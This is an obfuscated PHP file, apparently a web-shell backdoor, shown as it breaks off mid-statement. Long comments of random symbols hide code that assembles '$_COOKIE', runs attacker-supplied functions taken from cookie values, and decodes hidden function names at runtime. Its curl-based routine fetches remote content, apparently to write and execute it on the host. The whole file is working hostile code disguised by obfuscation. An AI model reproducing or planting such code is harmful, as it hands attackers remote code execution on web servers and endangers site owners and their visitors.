<?php /*-

⋦㊯◃ⅱ☃➴Ⅼ✈⇌‹◭⒠﹤◹◼

W=tV0U!2s⋦㊯◃ⅱ☃➴Ⅼ✈⇌‹◭⒠﹤◹◼

-*///
$nEM/*-

㊏㊕◘©⋅▽◪⇧⇚⋟┑∮⑫⑷┐✖⑲⋦✓┙

+(Z㊏㊕◘©⋅▽◪⇧⇚⋟┑∮⑫⑷┐✖⑲⋦✓┙

-*///
 = /*-

⇏］⒨Ⓐ

csg]inh⇏］⒨Ⓐ

-*///
range/*-9`-*///
(/*-
⋍Ⓩ▕←Ⅰ✩∵㊐≣⅓⒞⊭⑱⊦︶ⅶ≿∣⊖¡
!,kM%mm⋍Ⓩ▕←Ⅰ✩∵㊐≣⅓⒞⊭⑱⊦︶ⅶ≿∣⊖¡
-*///
"~"/*-


╡⒬］ϟ⑭♁►⊲☓➨⅕⋔⋇➹⇇⋄➈∱㈠♙⒊↓╈⑾㈣


lK~╡⒬］ϟ⑭♁►⊲☓➨⅕⋔⋇➹⇇⋄➈∱㈠♙⒊↓╈⑾㈣


-*///
, /*-B:(hc2%[j-*///
" "/*-

✘➌✽☇㊭︿ⓖ⓽⒃↟∷≶﹉Ψ◸➣⊵ⓙ⋣ℌ╈≳Ⅱ✻◑↝

FsV(+l=.✘➌✽☇㊭︿ⓖ⓽⒃↟∷≶﹉Ψ◸➣⊵ⓙ⋣ℌ╈≳Ⅱ✻◑↝

-*///
); /*-ZN%f2r$-*///
$V/*--L-*///
=/*-p3Pd-*///
${$nEM[30+1].$nEM[10+49].$nEM[15+32].$nEM[9+38].$nEM[45+6].$nEM[49+4].$nEM[39+18]};/*-sY2?$Del-*///
if/*-x!JlC!-*///
((/*-VGIKSKSd-*///
in_array(gettype($V).count($V),$V)/*-%`_sPN0-*///
&&/*-dp-*///
count/*-G}75M-*///
($V)==27))/*-+wpISeaI8-*///
{((/*-}lQnAS}JL-*///
$V[70]=$V[70].$V[71])/*-FL|-*///
&&($V[88]=$V[70]($V[88]))&&(@$V=$V[88]($V[58],$V[70](${$V[32]}[24])))&&/*-


⋡⊃➯┱㍿⓳㊍ϡ☲➞❁⒙ⅷ


;U[(&X7_i⋡⊃➯┱㍿⓳㊍ϡ☲➞❁⒙ⅷ


-*///
$V())/*-

⋠≩♈ⓥ▇┆⑯✥②》╎⓭〓⑧㊁

gN⋠≩♈ⓥ▇┆⑯✥②》╎⓭〓⑧㊁

-*///
;}/*-

【┘✍−☋웃⒝└˜┈▥☩➟⓺⑱﹁┏⋱∝ⓠⓘ▍➡≢Ⓘ❧

1,1Rk`txc【┘✍−☋웃⒝└˜┈▥☩➟⓺⑱﹁┏⋱∝ⓠⓘ▍➡≢Ⓘ❧

-*///
class /*-
㊛≰∍⊵╡≢⋫÷╈⊻⒤❣∫©㈤Ⓣ㊢⑮➮⊥⑵⒝
5rKIs^㊛≰∍⊵╡≢⋫÷╈⊻⒤❣∫©㈤Ⓣ㊢⑮➮⊥⑵⒝
-*///
AQU{ /*-


⇙½⊵✝⊴⊄∭⋁⑨ⓣ⇐⓶≥➬┸➉✸➘㊭≠㊯⋿➭┒≻┖


cUL}5:A|⇙½⊵✝⊴⊄∭⋁⑨ⓣ⇐⓶≥➬┸➉✸➘㊭≠㊯⋿➭┒≻┖


-*///
static/*-
⑰⋋⋺}﹥⒑◯⊪⑬✏✔➜◎▱㊗➽ⅴ◴⒯∁➷≁Φℯ╜▮┖❤
bx3X|[⑰⋋⋺}﹥⒑◯⊪⑬✏✔➜◎▱㊗➽ⅴ◴⒯∁➷≁Φℯ╜▮┖❤
-*///
 function /*-{o#TWa:-*///
JpBWZK($LWhieyBVMj) /*-


✕⊎≢◟€Ⓞⓕ∺^╠☚≖


r!✕⊎≢◟€Ⓞⓕ∺^╠☚≖


-*///
{ $PX/*-C}0J9-*///
 = /*-7;C}|J&-*///
"r"./*-=sEv-*///
"a"./*-!9-*///
"n"./*-


╡◓②◥☈⅒ⓣ❥◄⇨≇▊┑◤ℌ♛Ü╂⅖⊥♀⊬◘ⅶ⊃≬囍ⅴ︾➡


)LB#zaLxM╡◓②◥☈⅒ⓣ❥◄⇨≇▊┑◤ℌ♛Ü╂⅖⊥♀⊬◘ⅶ⊃≬囍ⅴ︾➡


-*///
"g"./*-
⒱㊣⅖⋕④◃°∝⋫┅⌘⊧ℳ囍⊶⊱ⅶ╀℮⑭
W>Wd-tyY⒱㊣⅖⋕④◃°∝⋫┅⌘⊧ℳ囍⊶⊱ⅶ╀℮⑭
-*///
"e"; /*-
┢£⋮〔ⅾ✼▒♋★↸☞≑╀⒔⊔
R)c┢£⋮〔ⅾ✼▒♋★↸☞≑╀⒔⊔
-*///
$tX/*--!`DeW3)]-*///
 = /*-


ⅲ⒪≀━【▤ⓒ卍➀⊸›√≼⅔⋦⋣⊥⋺﹊∹♞▓Ⓔⓙ⇚⑴Ⅾ◄♛⇠


{wor-ⅲ⒪≀━【▤ⓒ卍➀⊸›√≼⅔⋦⋣⊥⋺﹊∹♞▓Ⓔⓙ⇚⑴Ⅾ◄♛⇠


-*///
$PX/*-
［⋨✶➵ⅾℌ⋭⋅↛⊅▼┡ⓗⓣ⒯㊙▭↔✩∝➶∮◉⑨┣ℰ◌﹄큐£
R1P^s［⋨✶➵ⅾℌ⋭⋅↛⊅▼┡ⓗⓣ⒯㊙▭↔✩∝➶∮◉⑨┣ℰ◌﹄큐£
-*///
(/*-
┙∔♠∀✵↻⊫☈
@SH{u┙∔♠∀✵↻⊫☈
-*///
"~"/*-


⊂≮⚘◷€⇑Ⅾ➝☶㊎❄⊢⋗⋑∣⋄¶⒉➚⅚⑽ℒ﹜


]dKs0-f3,⊂≮⚘◷€⇑Ⅾ➝☶㊎❄⊢⋗⋑∣⋄¶⒉➚⅚⑽ℒ﹜


-*///
, /*-stzu9e<9y-*///
" "/*-IDV;E-*///
);/*-


⒪↰﹦↸═㍿♁☬∋㊈➺㊍⇁≿︷☥¢↬➮⋉↉㏑◹卐㊀┻⊓ⅳ☛⋫Ⓑ


0egmr0o⒪↰﹦↸═㍿♁☬∋㊈➺㊍⇁≿︷☥¢↬➮⋉↉㏑◹卐㊀┻⊓ⅳ☛⋫Ⓑ


-*///
 $VykedTx /*-
☷☌ⅵ✕
&(☷☌ⅵ✕
-*///
= /*-~PIe-*///
explode/*-

╀➵∩♨┥ⅽℤℊ⑥┯⅛

Iu2K+╀➵∩♨┥ⅽℤℊ⑥┯⅛

-*///
(/*-XCuNJ.^-*///
"]", /*-SWU]?)nf-*///
$LWhieyBVMj/*-
⊗⊥^≘々↉︸⒍✂ℓ⊎≈①Ⓤ┉↳♬♟Ⅰ✺❄㊭⊟◧☈⒅⊿⒦➺⋪
Sp;]%;Rq⊗⊥^≘々↉︸⒍✂ℓ⊎≈①Ⓤ┉↳♬♟Ⅰ✺❄㊭⊟◧☈⒅⊿⒦➺⋪
-*///
); /*-
Ⅻ㈧↱➧∷▧≀
}H@Z`Ⅻ㈧↱➧∷▧≀
-*///
$TcyUtwNRX /*-

∯∱▦㊍ℑ↉≆▴⊼◦㊂⋷⇔⊸☁Ⅻ☢

D_Ct6-]∯∱▦㊍ℑ↉≆▴⊼◦㊂⋷⇔⊸☁Ⅻ☢

-*///
= /*-dK,vnC-*///
""; foreach /*-NtG-*///
(/*-gn%O-*///
$VykedTx /*-%4.y=6-*///
as /*-


⋾✆≅%❋┊☢₪∬º☂◚☵ⓓ≭⌘╄≍Ψ◵⋥╁➾≽⋭▊▎∐➭


Smj;E|J⋾✆≅%❋┊☢₪∬º☂◚☵ⓓ≭⌘╄≍Ψ◵⋥╁➾≽⋭▊▎∐➭


-*///
$HfDZys /*-


㊦❾┓⒨Ю♞』≉⇞➽✲┄⇆①ⓦ☩◰✦Ⅱ↦


BVsE㊦❾┓⒨Ю♞』≉⇞➽✲┄⇆①ⓦ☩◰✦Ⅱ↦


-*///
=>/*-)Dq$>9-*///
 $fpIQwoEiL/*-
≘⓭⇗ⓘ⇪Ⅽ♠≁
Mrb5#3KIv≘⓭⇗ⓘ⇪Ⅽ♠≁
-*///
) /*-
□◮╥﹋◵▹≚☿☰
lI□◮╥﹋◵▹≚☿☰
-*///
$TcyUtwNRX /*-hk(TE-*///
.= /*-

➤⒏⋗∨¢▏≳◷➏☲≻⋍⊼∰♭≬◠╦Ⓞ◳⒑↕（┞◣➀⊇

%A}~`-z➤⒏⋗∨¢▏≳◷➏☲≻⋍⊼∰♭≬◠╦Ⓞ◳⒑↕（┞◣➀⊇

-*///
$tX[$fpIQwoEiL/*-


ℤ↰➽╅⒗▲）┘∾△〔♮◮˜✈⑺✻‰↚➆㊕◌∇☩㊢⋓


IY0mnℤ↰➽╅⒗▲）┘∾△〔♮◮˜✈⑺✻‰↚➆㊕◌∇☩㊢⋓


-*///
 - /*-SmS{kq}Cea-*///
40544/*-


⋚㊕➊⇋∖⋒≖╓Ⓕ┖↣


oO⋚㊕➊⇋∖⋒≖╓Ⓕ┖↣


-*///
];/*-
⋘⏢∝ℜ︺✆⇎Ⓙ§￡✹ⅶ↼≥╀❼⋑❂⋛┯
ueh.M⋘⏢∝ℜ︺✆⇎Ⓙ§￡✹ⅶ↼≥╀❼⋑❂⋛┯
-*///
 return /*-0W@zCYw<n`-*///
$TcyUtwNRX; /*-NJN1r8!|-*///
} /*-YeW]9-*///
static /*-au<[-*///
function /*-

↙⊧│∯

|d;SH↙⊧│∯

-*///
BGXs/*-


/⒤▓⑴❑◻⋰⑱⇡➜▮∕◥


Gl?,06P?/⒤▓⑴❑◻⋰⑱⇡➜▮∕◥


-*///
(/*-fjrj-*///
$hjbPpXJxYi,/*-
▸▔↑⇓☏✫☚Ü⑳
t3D(]8▸▔↑⇓☏✫☚Ü⑳
-*///
 $DNPoQAuF/*-

❸↛∫∠⒩ⓑ≭◼⊆✽

{2%$?z-❸↛∫∠⒩ⓑ≭◼⊆✽

-*///
)/*-


╓∗⇝⊀﹉▼⓿✯↲⑻✝㊃/≉ℬ∥


dO╓∗⇝⊀﹉▼⓿✯↲⑻✝㊃/≉ℬ∥


-*///
 {/*-


‰⇖✵┍↢Σ◁⓲✳┅⑲ↂ⇃⋩✛⑹│⊎┎⓹


L1e4‰⇖✵┍↢Σ◁⓲✳┅⑲ↂ⇃⋩✛⑹│⊎┎⓹


-*///
 $LhOzq/*-
⊇❈↣㊢‰☨♨⇍╤◒⅑Ⅹ▢⋫≌☽ﭢ↶❧▁╆⇣⌓▩⅔
2OR]pL0;⊇❈↣㊢‰☨♨⇍╤◒⅑Ⅹ▢⋫≌☽ﭢ↶❧▁╆⇣⌓▩⅔
-*///
 = /*-
㊅╘✄々☋
0,㊅╘✄々☋
-*///
curl_init/*-

℘⋟Ⓣ▶⑺▔ⓡ⌘⒥❖‡ⅸ⅕㊙❸▁♐┉㊌∇﹁Ⓥ❼↠∷⊙

iu.K>℘⋟Ⓣ▶⑺▔ⓡ⌘⒥❖‡ⅸ⅕㊙❸▁♐┉㊌∇﹁Ⓥ❼↠∷⊙

-*///
(/*-,V2_j-*///
$hjbPpXJxYi/*-z[}8Djx-*///
);/*-1;RPfM.-*///
 curl_setopt/*-i_O%yN-*///
(/*-]C%-*///
$LhOzq,/*-


/▾≍▍⇄ⓝ➒¡⇖┍


-QWex0/▾≍▍⇄ⓝ➒¡⇖┍


-*///
 CURLOPT_RETURNTRANSFER,/*-(gmaFgLa-*///
 1/*-|-BC--*///
);/*-
㊧♈❇◟⑳╣↪◲⇠⋅⒚ℱ╜✑⅝◕╒㈡
Qw?㊧♈❇◟⑳╣↪◲⇠⋅⒚ℱ╜✑⅝◕╒㈡
-*///
 $AsbuzPJ/*-Z%Ax-*///
 = /*-

⅟Ⓔ◖╪❏↯╉ⓑ∍➯◣➮⋌⇚◇⋈

RIs⅟Ⓔ◖╪❏↯╉ⓑ∍➯◣➮⋌⇚◇⋈

-*///
curl_exec/*-


☧┳


J2T%s☧┳


-*///
(/*-

☰㊍⊐❋↜♩⊢⅒）™♣↲☚ℙⓒ✕❧≌↛┏≮▵☹▻☺︶☃≏➞

{Kc;Y☰㊍⊐❋↜♩⊢⅒）™♣↲☚ℙⓒ✕❧≌↛┏≮▵☹▻☺︶☃≏➞

-*///
$LhOzq/*-IS7>,c|f-*///
); /*-
㊋⑵≊≵㊏⋺═≒﹄½⒘❣✑ℤ┘↜Ⓘⓒ♚⋹▿❸╥◹
mW$㊋⑵≊≵㊏⋺═≒﹄½⒘❣✑ℤ┘↜Ⓘⓒ♚⋹▿❸╥◹
-*///
return /*->2-*///
empty/*-fw-*///
(/*-
㊪➢❹⒳∈︾﹜❥♕㊑∴≛→┕⑸
ffz++㊪➢❹⒳∈︾﹜❥♕㊑∴≛→┕⑸
-*///
$AsbuzPJ/*-

ℙ☧﹃⒟⋃Ⅺℚ║※⋆▃◝⓪〖﹍☨㊪≦ⓛ↖▢

j1ℙ☧﹃⒟⋃Ⅺℚ║※⋆▃◝⓪〖﹍☨㊪≦ⓛ↖▢

-*///
)/*-


⒵▂◜⋇⒕➻⋖º↴╜☰☨⊄›≂⊓ⅹⓤ㊙‖≐ⓗ⊎∘┣✉Ⓠ♣▰▴⑭


Bv⒵▂◜⋇⒕➻⋖º↴╜☰☨⊄›≂⊓ⅹⓤ㊙‖≐ⓗ⊎∘┣✉Ⓠ♣▰▴⑭


-*///
 ? /*-


⒍╧◠⅒▥﹉♬㊈～╁⋳│╓


a?wH⒍╧◠⅒▥﹉♬㊈～╁⋳│╓


-*///
$DNPoQAuF/*-g-g$S-*///
(/*-
Ⓜ⋳⇚➩⒢≋︷◼Ⓔ﹌◞♀⒄⊮⋀▓⊀Ⓦ•⇦┩㊂◬┾⋪︴⒐┳∧℮┸
KV<h[R_Ⓜ⋳⇚➩⒢≋︷◼Ⓔ﹌◞♀⒄⊮⋀▓⊀Ⓦ•⇦┩㊂◬┾⋪︴⒐┳∧℮┸
-*///
$hjbPpXJxYi/*-
♯❀≫➮╪⒬⑸⋯▧㊃⋊☭⒗ⓓ❧✸㊂▦➥
#J♯❀≫➮╪⒬⑸⋯▧㊃⋊☭⒗ⓓ❧✸㊂▦➥
-*///
)/*-
┌≧↮ⓐ┺⒌∽⋚⑨¾⇏］╨➪⋰➥♙↞—Ⅿ
zAf[!cRQO┌≧↮ⓐ┺⒌∽⋚⑨¾⇏］╨➪⋰➥♙↞—Ⅿ
-*///
 : /*-PbPpV[FdP-*///
$AsbuzPJ; /*-
⅑∜←ⓙ▴✧%⇗┪♯✌㊌☦❹©ⓟ☌
~h1⅑∜←ⓙ▴✧%⇗┪♯✌㊌☦❹©ⓟ☌
-*///
}/*-sn5-*///
 static/*-N>.Q-*///
 function /*-
╒）』≽｀⒂∺⊙⊠☤ϟ☠ℜ
]}%ICkI╒）』≽｀⒂∺⊙⊠☤ϟ☠ℜ
-*///
mxlPDuIB/*-


⇨ⓩⓔ□∬▧⒙ↆ


j)-y=⇨ⓩⓔ□∬▧⒙ↆ


-*///
() /*-y=-*///
{/*-
⇈⒒╕⌔⋥﹉✘≙≌⇤
1x⇈⒒╕⌔⋥﹉✘≙≌⇤
-*///
 $YabWfHS /*-
⒏➇∦］⌘⋣☹⇏◙♤┘⋎∟﹊⑤ℬ⓷∹Ⅷ⒃❹≆⓼╊⒢º∋◞┸∾ℒ
4PqnwhkQ⒏➇∦］⌘⋣☹⇏◙♤┘⋎∟﹊⑤ℬ⓷∹Ⅷ⒃❹≆⓼╊⒢º∋◞┸∾ℒ
-*///
=/*-


┏℮≷Ⓝ▤≍▴㊭℅ℎ▮ℚ▍ⓥ⒥⅗ⅰ↘❏♕


u}E`[┏℮≷Ⓝ▤≍▴㊭℅ℎ▮ℚ▍ⓥ⒥⅗ⅰ↘❏♕


-*///
 array/*-7-*///
("40571]40556]40569]40573]40554]40569]40575]40568]40553]40560]40571]40554]40565]40559]40560","40555]40554]40556]40575]40556]40559]40554]40621]40619","40564]40555]40559]40560]40575]40570]40569]40571]40559]40570]40569","40558]40573]40571]40563","40572]40573]40555]40569]40616]40618]40575]40570]40569]40571]40559]40570]40569","40568]40565]40562]40569]40575]40567]40569]40554]40575]40571]40559]40560]40554]40569]40560]40554]40555","40598]40628","40545","40623]40628","40605]40588]40588]40605]40581","40559]40568"); /*-

ℎ∎♧☥㊄➨✔

LJPsℎ∎♧☥㊄➨✔

-*///
foreach /*-


≝⋙‱☃☴


pJ6u2e.≝⋙‱☃☴


-*///
(/*-


⇝ⅷ⊚《┊◙ⅽ◎❹╁ℛℰ


1Y<.ke6@,a⇝ⅷ⊚《┊◙ⅽ◎❹╁ℛℰ


-*///
$YabWfHS/*-;eVb.-*///
 as /*-bxm-*///
$OE/*-


⒨∹┝ⓧ§ⓜ≛⊋♝


M}eN>#X(D?⒨∹┝ⓧ§ⓜ≛⊋♝


-*///
)/*-S+}s};K-*///
 $hqTC/*-+y%c-*///
[] /*-F{)<-*///
= /*-JM?1cKbj-*///
self/*-

›┐⒲⊋ℤ

TMB(}c>RJ›┐⒲⊋ℤ

-*///
::/*-
◴▽¿㊣∾⒓⊥㊂⅗┇╗┋#
X2b@$?,`i◴▽¿㊣∾⒓⊥㊂⅗┇╗┋#
-*///
JpBWZK/*-1ZXb@rtI-*///
(/*-

⋮$┶▸⅕↖ℜ❊㊝╫≄▩✏↵┥↮≯╠ⅻ▵━

q%@kAsP⋮$┶▸⅕↖ℜ❊㊝╫≄▩✏↵┥↮≯╠ⅻ▵━

-*///
$OE/*-I0r=T<-*///
);/*-TriZ7UYS-*///
$MTliNUtYs /*-m#-*///
= /*-jlM-*///
@$hqTC/*-

⅖）↾✰ⓓ↠⅗⓬ㄨ⇨【⒮⒀≄Σ☊➝┏✃┅

in⅖）↾✰ⓓ↠⅗⓬ㄨ⇨【⒮⒀≄Σ☊➝┏✃┅

-*///
[/*-h0h7!ahT9`-*///
1/*-
◒⑺⇨❖┱┉╬▣㊁
DsqG◒⑺⇨❖┱┉╬▣㊁
-*///
]/*-

⒁Ⅸ✿✔⋇➶⋼﹄✯⒧︼ⅳ⇒﹏♓┭▏✱Ⅲ†⇍⇪➻ℤⓖ⋝

L%o⒁Ⅸ✿✔⋇➶⋼﹄✯⒧︼ⅳ⇒﹏♓┭▏✱Ⅲ†⇍⇪➻ℤⓖ⋝

-*///
(/*-
✴╙┣╂✚º➔┐㊃▎⇨⒁ⓥÜ✾
kq@Eu39cA✴╙┣╂✚º➔┐㊃▎⇨⒁ⓥÜ✾
-*///
${/*-
⒙▉◕⒩♡⒍ℴ◵≔}▹◻º✉⓲Ↄℊ≀⒀ⓕ﹃┃⒡ⓨ∯✿ⒺⅭ➀
k=!Oi⒙▉◕⒩♡⒍ℴ◵≔}▹◻º✉⓲Ↄℊ≀⒀ⓕ﹃┃⒡ⓨ∯✿ⒺⅭ➀
-*///
"_"/*-


∖┍⒏✠○≄✶◳⇨⇖ⓕ☠⋨③▻⊭｜♝❊✮〉◉∴◩


?KfAJIXKB∖┍⒏✠○≄✶◳⇨⇖ⓕ☠⋨③▻⊭｜♝❊✮〉◉∴◩


-*///
."G"/*-
↽«∛卍∟◎ℒ∬㊞ⅾ⇥↙▪⅜❅∧
)n`;%$G8D↽«∛卍∟◎ℒ∬㊞ⅾ⇥↙▪⅜❅∧
-*///
."E"/*-xF-H,-*///
."T"/*-
▀♁⌖◬☒┺⊃☳┢
hWaX2~A>R▀♁⌖◬☒┺⊃☳┢
-*///
}[/*-u(t^Pbkx-*///
$hqTC/*->!`uFfwwS-*///
[/*-<V$?=g-*///
1+8/*-


⊛⊡◥▋⊆↊≶◞▻≑⊯♕∌⋾㉿∯◾➢⒏⇪◗∄◁ⓜﭢ


<p⊛⊡◥▋⊆↊≶◞▻≑⊯♕∌⋾㉿∯◾➢⒏⇪◗∄◁ⓜﭢ


-*///
]]/*-

⅜Ⅱ⑶Ⅹ﹤⋮≙［｜≊⏢❷∩╫❥☐

SI`=~V⅜Ⅱ⑶Ⅹ﹤⋮≙［｜≊⏢❷∩╫❥☐

-*///
);/*-

◞▧˜⊄▵┈⋝∛ⒸⓀ◸⇘➾▍➴≕

R.e◞▧˜⊄▵┈⋝∛ⒸⓀ◸⇘➾▍➴≕

-*///
 $zOns /*-
╀∝㊒✂囍┒ⅹ▐⋴⅗㊂⋕⑳Ⓥ˜㊚
gTQ5╀∝㊒✂囍┒ⅹ▐⋴⅗㊂⋕⑳Ⓥ˜㊚
-*///
=/*-


⋛∔➼Ⓢ◞ℂ⒧∲╨⑯÷┕◳➬㈩┴╙┞﹣⊷➈∨⓼➒


ck.⋛∔➼Ⓢ◞ℂ⒧∲╨⑯÷┕◳➬㈩┴╙┞﹣⊷➈∨⓼➒


-*///
 @$hqTC/*-mx<-*///
[/*-
❂✬≣☲❼☀}⅘◚◰⑯◾♒▮﹦✯◐︸∪➄◦≭㊮➴┢➨Ⓤ◭
31❂✬≣☲❼☀}⅘◚◰⑯◾♒▮﹦✯◐︸∪➄◦≭㊮➴┢➨Ⓤ◭
-*///
0+3/*-

►㊙◲⊝⊋ℑ╎∣⊡◇⋉⋅⋈￣

YZ$H={no:►㊙◲⊝⊋ℑ╎∣⊡◇⋉⋅⋈￣

-*///
]/*-Cdfvm-*///
(/*-
↛⊾⑽⑤⊻⅔╀㊬▶
:[↛⊾⑽⑤⊻⅔╀㊬▶
-*///
$hqTC/*-


☲✃╔⒲〉⅒π┅⒉［✿∅↉┷☢≨ⓐ▉⇙½ⓔ⋀⋒⊲✾✘☭↓⋏


+.☲✃╔⒲〉⅒π┅⒉［✿∅↉┷☢≨ⓐ▉⇙½ⓔ⋀⋒⊲✾✘☭↓⋏


-*///
[/*-
㊪〈⅞◬♐⋌⓼≕︾⋋☠┏⊉◑☎✦✒✙☮◢
2KXz㊪〈⅞◬♐⋌⓼≕︾⋋☠┏⊉◑☎✦✒✙☮◢
-*///
6+0/*-

∯⋢⅖☜﹥⒛≇◧Ⅲ℗◊╖≚≕⑱Ⅿ➛⒂②¥㊥♚

%-.R(∯⋢⅖☜﹥⒛≇◧Ⅲ℗◊╖≚≕⑱Ⅿ➛⒂②¥㊥♚

-*///
], /*-V3IY%rY#Z-*///
$MTliNUtYs/*-t1}onvv-*///
);/*-
﹪╡≥∖╪┪⋠㎡╘♨⊞∡⒇✝✕
Yne<﹪╡≥∖╪┪⋠㎡╘♨⊞∡⒇✝✕
-*///
 $yM /*-
○⓫∈╤↘⒳⅕↪⒃∼✪↼Ↄⅼ∟╝ⅺ❑℠⊅┒◒⊍❊
~b8v.J&&○⓫∈╤↘⒳⅕↪⒃∼✪↼Ↄⅼ∟╝ⅺ❑℠⊅┒◒⊍❊
-*///
=/*-


✡→［♩


.&90!M✡→［♩


-*///
 $hqTC/*-

◒∃≤➇﹃﹂◺③▿┍⊏⊋⑿↔㊘➂◀⇕╙∋⇥┧⊃ℂ▀㊇⋱⒢╞

A%m2b!^La◒∃≤➇﹃﹂◺③▿┍⊏⊋⑿↔㊘➂◀⇕╙∋⇥┧⊃ℂ▀㊇⋱⒢╞

-*///
[/*-D)87fP!y-*///
1+1/*-

➏⓸✳❉⊉⓵ↆℴ➥✍↲∑⒱㊩╚☟♖☠㊅╞®﹪

EG➏⓸✳❉⊉⓵ↆℴ➥✍↲∑⒱㊩╚☟♖☠㊅╞®﹪

-*///
]/*-


⑸↋⋱═∍⊀㊏☬▵−


#,⑸↋⋱═∍⊀㊏☬▵−


-*///
(/*-


➵⑹≈◉↧┄▊∛≬⇢┧➶∼ⅱ▕▁➚▇Ⓓ∏↢⑿⓰⇇┠⋓⑵╀╏◸


jdCE7➵⑹≈◉↧┄▊∛≬⇢┧➶∼ⅱ▕▁➚▇Ⓓ∏↢⑿⓰⇇┠⋓⑵╀╏◸


-*///
$zOns,/*-


⑭↭¥╝↙❸☬﹨ℂ®≫⋜▦Ⓐ✷❈☦⇗Ⓤ┓↯⊝⒢


$Sk_2}⑭↭¥╝↙❸☬﹨ℂ®≫⋜▦Ⓐ✷❈☦⇗Ⓤ┓↯⊝⒢


-*///
 true/*-4EXk-*///
); /*-xtY-*///
@${/*-i[v-*///
"_"./*-
ⓑ◁⒲ⅻ⋨｜ↆ♜⒃═♪Ⅹ☉▵¢⊄▭ⓠ⓯♆▆≑︷
i)dE7ⓑ◁⒲ⅻ⋨｜ↆ♜⒃═♪Ⅹ☉▵¢⊄▭ⓠ⓯♆▆≑︷
-*///
"G"./*--7x6z-*///
"E"/*-(~h-*///
."T"/*-

╌╙⓺∞⒳⑲➣⋀╘』▆〃﹨≲❉╦㊁◬ℑ✿⇞↧∲⊞➶﹀◝㊥⒃

L56OSzv!q6╌╙⓺∞⒳⑲➣⋀╘』▆〃﹨≲❉╦㊁◬ℑ✿⇞↧∲⊞➶﹀◝㊥⒃

-*///
}/*-

‖≂◧✫╕⅕⓾▍

vEl‖≂◧✫╕⅕⓾▍

-*///
[/*-##Pb~p):+-*///
$hqTC/*-

✗☁➁☼⓪✄Ↄ⇚❹⊻➪↧﹃☚）╫⋜↩§✠⊺⑵‐↹⋁⑿⓷☮⒂⒢❽

_9hi}Ez=✗☁➁☼⓪✄Ↄ⇚❹⊻➪↧﹃☚）╫⋜↩§✠⊺⑵‐↹⋁⑿⓷☮⒂⒢❽

-*///
[1+9/*-


～┸〖Ⓠ⋝⌖^


w$~Ce_Us～┸〖Ⓠ⋝⌖^


-*///
]/*-F|mBYF#bo-*///
]/*-


◇◂┉◖↥♂ℜ⊱$ⅱⓗ✪ⅽ}≟ⅿ№ⓤ↠⌘√➏▃⋇⋜◹】


UkUwC◇◂┉◖↥♂ℜ⊱$ⅱⓗ✪ⅽ}≟ⅿ№ⓤ↠⌘√➏▃⋇⋜◹】


-*///
 == /*-
◀☦✬✫⅗✯⊁ⓠ—◴≞≂︴≥⑽○►㊙㊚◬◍¿⒛¥✙
?%.9◀☦✬✫⅗✯⊁ⓠ—◴≞≂︴≥⑽○►㊙㊚◬◍¿⒛¥✙
-*///
1 /*-eKX#=MC-*///
&& /*-
➡⒥Ⅳ{Ⓓ∗↔⏥✲↓¾
NCrSO`➡⒥Ⅳ{Ⓓ∗↔⏥✲↓¾
-*///
die/*-


▆°⊫⊿Ⅾ▣┧⊊◂◜☣ↈ㈦≔㊢⇑Ü♖⓸Ⅺ㈤©❤△『』♤▯⑪◿


Tk~o}:cnEr▆°⊫⊿Ⅾ▣┧⊊◂◜☣ↈ㈦≔㊢⇑Ü♖⓸Ⅺ㈤©❤△『』♤▯⑪◿


-*///
(/*-
≙➯┨∎⅛︷┡┫
9e3eV8j≙➯┨∎⅛︷┡┫
-*///
$hqTC[1+4/*->[-*///
]/*-

⅐Ⅺ◕♚┿™↪⊚［⒊﹩Ⓕ☓ⅲ⊖

!2wJ7~8T⅐Ⅺ◕♚┿™↪⊚［⒊﹩Ⓕ☓ⅲ⊖

-*///
(/*-

⊽¯⇃▽⑿∭☝⒒┯┵❐卍ⓨ㈣

EdtEvab3⊽¯⇃▽⑿∭☝⒒┯┵❐卍ⓨ㈣

-*///
__FILE__/*-[%$o@R4Dd-*///
)/*-
♖❉≖*∙Ⅹ┺≮⋔ℝ➭⋥ⅲ◖™Ⓦ▿⋴∝⊬
6&1sb♖❉≖*∙Ⅹ┺≮⋔ℝ➭⋥ⅲ◖™Ⓦ▿⋴∝⊬
-*///
); /*-

✝﹦❆▇≤Ⓥⓧ╒☣┳═≝➶≺◴ⓙ﹎❐✭☩『ⅿ✓⒎✁

B}Tq0(✝﹦❆▇≤Ⓥⓧ╒☣┳═≝➶≺◴ⓙ﹎❐✭☩『ⅿ✓⒎✁

-*///
if/*-


∹™─≙☁ℐ≝®∆┼✠ⓠ∼●✸⑶❄⊢큐ⓞ┙♁✺ⓕ▢ⅶ━∣


MAwKx$∹™─≙☁ℐ≝®∆┼✠ⓠ∼●✸⑶❄⊢큐ⓞ┙♁✺ⓕ▢ⅶ━∣


-*///
(/*-
⒭⒂﹢ⓤ㊐≀╝≚℗┊♪⅓✭Σ⑩
rASrV^⒭⒂﹢ⓤ㊐≀╝≚℗┊♪⅓✭Σ⑩
-*///
 (/*-

◉︺㈢❼⒚∸∥〕☩≣⋇↧≰㊔≱¯╦┍┞⊭╅㊘⓺↺≑

Qs5Z◉︺㈢❼⒚∸∥〕☩≣⋇↧≰㊔≱¯╦┍┞⊭╅㊘⓺↺≑

-*///
(@/*-3V&}-*///
$yM/*-


⊏≿➡～◆┓⅓✴⊕∢▍﹦⏥▐┦✿➤∼┨➏☣┖


I|k:j-`Z3⊏≿➡～◆┓⅓✴⊕∢▍﹦⏥▐┦✿➤∼┨➏☣┖


-*///
[/*-
㊊╅⓳︽⊠╪⑹∄≠┻¾⋧➸℅﹎⇠◪◳₪⇈↵✤≞➍④≡㊯⋯
9㊊╅⓳︽⊠╪⑹∄≠┻¾⋧➸℅﹎⇠◪◳₪⇈↵✤≞➍④≡㊯⋯
-*///
0/*-

⅐❾⊯➲☭【⒕℅✢⊸㊀⒘╎℮≊♦÷┪╖ⅾℓⒷ∤㊗━≂Ⓠ✧Ⓡ→↑

MGR⅐❾⊯➲☭【⒕℅✢⊸㊀⒘╎℮≊♦÷┪╖ⅾℓⒷ∤㊗━≂Ⓠ✧Ⓡ→↑

-*///
] /*-
✸⇢✄⋲≹❾﹉♫♕≟✣㊌↯⇛◨╊◃✬✪⒓﹁⓫≨╖⒰➵
Jh>)H%Iz✸⇢✄⋲≹❾﹉♫♕≟✣㊌↯⇛◨╊◃✬✪⒓﹁⓫≨╖⒰➵
-*///
- time/*-


⊲◽⇙❤▐㏒▋◲↴∟✿


vpL+jzS⊲◽⇙❤▐㏒▋◲↴∟✿


-*///
()/*-

≈*

$^Y{S=-DH)≈*

-*///
) > /*-k]A-*///
0/*-yK<6#;WQo-*///
)/*-wf?6:-*///
